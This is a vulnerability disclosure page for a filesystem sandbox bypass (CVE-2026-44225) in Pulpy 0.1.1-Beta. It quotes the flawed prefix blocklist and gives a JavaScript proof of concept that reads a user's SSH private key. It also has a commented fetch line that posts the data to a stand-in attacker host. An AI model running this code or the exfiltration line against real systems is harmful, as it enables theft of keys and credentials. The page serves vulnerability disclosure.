Skip to main content

Pulpy 0.1.1-Beta – Filesystem Sandbox Bypass

Categories: WebApps

Pulpy 0.1.1-Beta – Filesystem Sandbox Bypass

Proof of Concept (PoC)

poc.js
# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
# Google Dork: N/A
# Date: 2026-06-19
# Exploit Author: Onur BILICI @basekill
# Vendor Homepage: https://github.com/enesgkky/pulpy
# Software Link: https://github.com/enesgkky/pulpy
# Version: <= 0.1.1-Beta
# Tested on: macOS, Linux
# CVE: CVE-2026-44225

Description:
  Pulpy injects a 'pulpy.fs' JavaScript API into every packaged web application, 
  granting it access to the host filesystem. A 'validateFsPath()' function is 
  implemented to sandbox this access using a blocklist. However, this blocklist 
  is incomplete. 
  
  The implementation only catches root-level paths (e.g., matching "/Library/" 
  at index 0), meaning it completely misses user-specific paths such as 
  "/Users/<username>/Library/" or critical configuration directories like 
  "~/.ssh/", "~/.aws/", and "~/Documents/". 
  
  As a result, any malicious web application packaged with Pulpy can bypass the 
  sandbox to read and write arbitrary sensitive files in the user's home directory.

Root Cause Analysis:
  In 'src/bridge/native_modules.mm', the path validation logic relies on a weak 
  prefix check:
  
  std::string normalized = fs::weakly_canonical(p).string();
  if (normalized.find("/etc/") == 0 ||
      normalized.find("/var/") == 0 ||
      normalized.find("/usr/") == 0 ||
      normalized.find("/System/") == 0 ||
      normalized.find("/Library/") == 0) {
      return "";
  }
  return normalized;

Proof of Concept (PoC):
  An attacker can execute the following JavaScript code within a Pulpy-packaged 
  application to exfiltrate sensitive user data:

  ```javascript
  // Bypassing the sandbox to read sensitive files from the user's home directory
  try {
      // Example target: SSH private key
      // Note: You need to replace '<username>' with the target's actual username or dynamically resolve it
      const sshKeyPath = "/Users/<username>/.ssh/id_rsa"; 
      
      pulpy.fs.readFile(sshKeyPath, 'utf8', (err, data) => {
          if (err) {
              console.error("Failed to read file:", err);
              return;
          }
          console.log("Successfully bypassed sandbox! Content:n", data);
          
          // Exfiltration logic can be placed here (e.g., fetch('[https://attacker.com/log](https://attacker.com/log)', {method: 'POST', body: data}))
      });
  } catch (e) {
      console.error("Exploit failed:", e);
  }

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...